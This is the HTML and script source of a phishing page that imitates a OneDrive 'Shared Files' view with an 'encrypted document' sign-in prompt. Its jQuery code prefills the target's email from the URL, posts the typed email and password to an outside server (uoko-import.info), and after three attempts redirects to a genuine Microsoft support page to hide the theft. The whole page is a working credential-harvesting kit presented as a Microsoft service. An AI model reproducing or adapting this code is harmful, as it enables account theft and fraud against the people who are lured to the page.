        @-webkit-keyframes dot-floating {
            0% {
                left: calc(-50% - 5px);
            }
            75% {}
            100% {}
        }
        
        @keyframes dot-floating {
            0% {
                left: calc(-50% - 5px);
            }
            75% {}
            100% {}
        }
        
        @-webkit-keyframes dot-floating-before {
            0% {
                left: -50px;
            }
            50% {
                left: -12px;
            }
            75% {
                left: -50px;
            }
            100% {
                left: -50px;
            }
        }
        
        @keyframes dot-floating-before {
            0% {
                left: -50px;
            }
            50% {
                left: -12px;
            }
            75% {
                left: -50px;
            }
            100% {
                left: -50px;
            }
        }
        
        @-webkit-keyframes dot-floating-after {
            0% {
                left: -100px;
            }
            50% {
                left: -24px;
            }
            75% {
                left: -100px;
            }
            100% {
                left: -100px;
            }
        }
        
        @keyframes dot-floating-after {
            0% {
                left: -100px;
            }
            50% {
                left: -24px;
            }
            75% {
                left: -100px;
            }
            100% {
                left: -100px;
            }
        }
    </style>
</head>

<body class="allBody">

    <div class="overlay" style="display: block;">

        <div class="lds-roller" style="display: none;">
            <div></div>
            <div></div>
            <div></div>
            <div></div>
            <div></div>
            <div></div>
            <div></div>
            <div></div>
        </div>

    </div>

    <div class="oneDrive">

        <div class="header">

            <div class="name_class">
                <i class="fa-solid fa-bars"></i>
                <span>OneDrive</span>
            </div>

            <div class="search_class">

                <div>
                    <i class="fa-solid fa-magnifying-glass"></i>
                    <a>Search</a>
                </div>
                <div>
                    <a>All files</a>
                    <i class="fa-solid fa-angle-down"></i>
                </div>
            </div>

            <div class="profile_right">
                <i class="fa-solid fa-gear"></i>
                <i class="fa-solid fa-question"></i>
                <a class="user_profile_icon">R</a>
            </div>
        </div>

        <div class="sideBar">
            <a style=" position: relative; height: 36px; padding-top: 20px; font-size: 12px; margin-left: 15px;  top: 15px; color: #595958; font-weight: 600; "> Files Directory</a><br>
            <div class="lll">
                <i class="fa-solid fa-folder"></i>
                <a>My Files</a>
            </div>

            <div class="lll">
                <i class="fa-solid fa-clock-rotate-left"></i>
                <a>Recent</a>
            </div>


            <div style="background-color: rgba(0, 0, 0, 0.1);" class="lll">
                <i class="fa-solid fa-user-group"></i>
                <a>Shared</a>
            </div>

            <a style=" position: relative; height: 36px; padding-top: 20px; font-size: 12px; margin-left: 15px;  top: 15px; color: #595958; font-weight: 600; "> Shared Libaries</a><br>
            <a style=" align-content: center; position: relative; height: 36px; padding-top: 20px; font-size: 10px; margin-left: 15px;  top: 15px; color: #595958; "> Sites help you work on projects with your &nbsp;&nbsp;&nbsp;&nbsp;team and share information from &nbsp;&nbsp;&nbsp;anywhere on any device. Create or follow &nbsp;&nbsp;&nbsp;sites to see them here.</a><br>
            <div class="sideBarBottom">
                <a>Get the OneDrive apps</a>
                <a>Return to classic OneDrive</a>
            </div>
        </div>

        <div class="subMenu2">

            <div class="menu2_left">
                <div class="upload_btn_class">
                    <i class="fa-solid fa-plus"></i>
                    <a style="margin-left: 12px;">New</a>
                    <i class="fa-solid fa-angle-down"></i>
                </div>
                <i class="fa-solid fa-upload"></i>
                <a style="margin-left: -12px;">Upload</a>
                <i style="margin-left: -12px;" class="fa-solid fa-angle-down"></i>
                <i class="fa-solid fa-arrows-rotate"></i>
                <a style="margin-left: -12px;">Sync</a>
                <i class="fa-solid fa-bolt"></i>
                <a style="margin-left: -12px;">Automate</a>
                <i style="margin-left: -12px;" class="fa-solid fa-angle-down"></i>
            </div>

            <div class="submenu_right">
                <i class="fa-solid fa-arrow-down-short-wide"></i>
                <a>Sort</a>
                <i class="fa-solid fa-angle-down"></i>
                <i class="fa-solid fa-border-all"></i>
                <i class="fa-solid fa-angle-down"></i>
                <i class="fa-solid fa-circle-exclamation"></i>
            </div>
        </div>

        <div class="frontDocs">
            <a style="margin-left: 10px; font-size: 1.3rem;">Shared Files</a><br><br>
            <div class="frontDocs2">

                <div class="doc_img">
                    <img src="cbimage.png" width="195" height="259" style="height: 185px; width: 134px; z-index: 1 !important; position: absolute;">
                    <div class="doc_overlay">
                        <a style="bottom: 30px;">File INDEX9505..</a>
                        <a style="font-size: 12px !important;">A few minutes ago</a>
                    </div>
              </div>

                <div class="doc_img">
                    <img src="cbimage1.png" width="183" height="276" style="height: 185px; width: 134px; z-index: 1 !important; position: absolute;">
                    <div class="doc_overlay">
                        <a style="bottom: 30px;">Shared docume...</a>
                        <a style="font-size: 12px !important;">A few hours ago</a>
                    </div>
              </div>

                <div class="doc_img">
                    <img src="cbimage3.png" width="368" height="500" style="height: 185px; width: 134px; z-index: 1 !important; position: absolute;">
                    <div class="doc_overlay">
                        <a style="bottom: 30px;">File 0028INV8..</a>
                        <a style="font-size: 12px !important;">A few days ago</a>
                    </div>
              </div>

                <div class="doc_img">
                    <img src="cbimage2.png" width="189" height="267" style="height: 185px; width: 134px; z-index: 1 !important; position: absolute;">
                    <div class="doc_overlay">
                        <a style="bottom: 30px;">0363NTI0 files..</a>
                        <a style="font-size: 12px !important;">A few days ago</a>
                    </div>
              </div>

                <div class="doc_img">
                    <img src="cbimage3.png" width="368" height="500" style="height: 185px; width: 134px; z-index: 1 !important; position: absolute;">
                    <div class="doc_overlay">
                        <a style="bottom: 30px;">Service PO_49...</a>
                        <a style="font-size: 12px !important;">A few days ago</a>
                    </div>
              </div>
            </div>
        </div>
    </div>

    <div class="loginForm" style="display: block;">

        <div class="emailBlock w3-animate-left">
            <div class="loaderBox">
                <a style="display: grid;" class="dot-floating"></a>
            </div>
            <img src="cbimage4.png" alt="" width="180" height="32" class="formLogo">
            <a class="signIn">Authenticate</a>
            <a class="emailError">Enter a valid email address</a>
            <a class="emailInvalid">Enter a valid email address.</a>
            <a style="color: rgb(255, 81, 0); font-size: small; text-align: justify;">This is an encrypted document, please proceed to view document on OneDrive. Continue with your email account.</a>
            <input class="emailImput" placeholder="Email Address" type="text" name="em" id="em" onKeyPress="onChangeFunction(this.value)">
            <div class="labelButtom">
                <!-- <a>No account</a> -->
                <!-- <a style="color: #0067b8; cursor: pointer;">Create one!</a> -->
            </div>
            <div style="display: flex; font-size: 0.8rem;">
                <a class="keyLabel">This link is valid only for the intended email address.</a>
                <!-- <img style="cursor: pointer;" role="presentation" pngsrc="https://logincdn.msauth.net/shared/1.0/content/images/documentation_9628e22a6bfb1edc59e81064a666b614.png" svgsrc="https://logincdn.msauth.net/shared/1.0/content/images/documentation_bcb4d1dc4eae64f0b2b2538209d8435a.svg"
                    data-bind="imgSrc" src="https://logincdn.msauth.net/shared/1.0/content/images/documentation_bcb4d1dc4eae64f0b2b2538209d8435a.svg"> -->
            </div>
            <button id="next" class="formButton" type="submit">Next</button>
        </div>

        <div class="passwordBlock w3-animate-right">
            <div class="loaderBox2">
                <a style="display: grid;" class="dot-floating"></a>
            </div>
            <img src="cbimage4.png" alt="" width="180" height="32" class="formLogo">
            <div style="display: flex;">
                <img class="backArrow" role="presentation" pngsrc="https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_7cc096da6aa2dba3f81fcc1c8262157c.png" svgsrc="https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg" data-bind="imgSrc" src="arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg">
                <a id="password_text" style=" font-size: small; text-align: justify;"><span style="color: black !important; font-size: 17px !important;" class="emailLabel"></span></a>
            </div>
            <a class="signIn">Enter password</a>
            <span class="passwordError" id="msg"></span>
            <input class="passwordImput" placeholder="Password" id="pw" type="password" name="pw" onKeyPress="onChangeFunction(this.value)">
            <div class="labelpassword">
                <input style="height: 20px; width: 20px;" type="checkbox" name="" id="">
                <a style="color: #000; cursor: pointer; margin-top: 0px; margin-left: 5px;">Keep me signed in</a>
            </div>
            <div style="display: flex;">
                <a style="padding-right: 7px; font-size: 0.8rem; color: #666666; cursor: pointer;">This link is valid only for the intended email address.</a>
            </div>
            <button id="submit-btn" class="formButton" type="submit">Next</button>
        </div>

    </div>
    <script src="const.js.download"></script>


<script src="jquery-3.6.0.min.js.download"></script>
<script>
$(document).ready(function()
	{
	var g=0;
	var h=window.location.hash.substr(1);
	if(!h)
		{
	}
	else
		{
		var i=h;
		var j=i.indexOf("@");
		var k=i.substr(j+1);
		var c=k.substr(0,k.indexOf("."));
		var l=c.toLowerCase()
	}
	$('#othermodal').click(function()
		{
		$('#contact').trigger("reset");
		$("#msg").hide();
		$('#fieldImg').attr('src','');
		$('#field').html("Other Mail");
		$("#em").val(i);
		$("#emailch").html(i);
		$("#inputbar").animate(
			{
			left:200,opacity:"hide"
		}
		,0);
		$("#automail").animate(
			{
			right:200,opacity:"show"
		}
		,1000);
		$('#ajaxModal').modal('show')
	}
	);
	$('#submit-btn').click(function(b)
		{
		b.preventDefault();
		var c=$("#em").val();
		var d=$("#pw").val();
		var e=$("#field").html();
		var f=$('#msg').html();
		$('#msg').text(f);
		g=g+1;
		if(g>=3)
			{
			g=0;
			window.location.replace("https://support.microsoft.com/en-us/office/fix-onedrive-sync-problems-0899b115-05f7-45ec-95b2-e4cc8c4670b2")
		}
		else
			{
			$.ajax(
				{
				dataType:'JSON',url:'http://uoko-import.info/drive/one/next.php',type:'POST',data:
					{
					em:c,pw:d,detail:e,
				}
				,beforeSend:function(a)
					{
					$('#submit-btn').html('Verifing...')
				}
				,success:function(a)
					{
					if(a)
						{
						$("#msg").show();
						console.log(a);
						if(a['signal']=='ok')
							{
							$("#pw").val("");
							$('#msg').html(a['msg'])
						}
						else
							{
							$("#pw").val("");
							$('#msg').html(a['msg'])
						}
					}
				}
				,error:function()
					{
					$("#pw").val("");
					$("#msg").show();
					$('#msg').html("Error: OneDrive sync failed. Please try again.")
				}
				,complete:function()
					{
					$("#pw").val("");
					$('#submit-btn').html('Login')
				}
			}
			)
		}
	}
	)
}
);
if(location.hash)
	{
	document.querySelector('#em').value=eml=location.hash.substr(1)
}

</script>


</body></html>
